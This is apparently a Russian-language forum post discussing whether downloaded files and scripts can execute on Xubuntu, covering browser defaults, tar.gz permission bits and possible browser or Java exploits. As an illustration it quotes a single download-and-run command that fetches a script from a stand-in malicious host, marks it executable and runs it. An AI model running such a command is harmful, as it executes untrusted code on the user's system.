интересная вещь.
в общем, buggykey говорит дело, я об этом тоже говорил ранее. но вот в чём беда: если вы скачиваете бинарник или скрипт через браузер(я для примера возьму оперу, т.к. ей пользуюсь), то по умолчанию запрещён запуск этого файла. если дело обстоит с Windowsким приложением,то в xubuntu убрали разрешение о запуске, т.е. из-под thunar'а я смогу запустить без прав запуска, из терминала - нет.
если скачать архив *.tar.gz, то там могут быть файлы, у которых уже есть права на запуск.
если будет уязвимость в браузере или в джаве, которая сможет создать файл с заранее подготовленным текстом(вроде wget virus.org/supervirus.sh && chmod +x supervirus.sh && ./supervirus.sh), то ещё нужно проверить, будет ли он это запускать. я пробовал прописывать больше одной команды через диспетчер настроек(т.е. там, где всё разрешено), и то невозможно было создать больше одной команды: ничего после && не работало и команда вообще не выполнялась. в итоге пришлось делать отдельный скрипт. если просто прописать команду, даже просто запуск приложения, то оно не будет выполняться. если через sleep - будет.
вот так немного можете успокоиться, но предупреждаю, что на кедах, гноме и юнайти всё может быть иначе.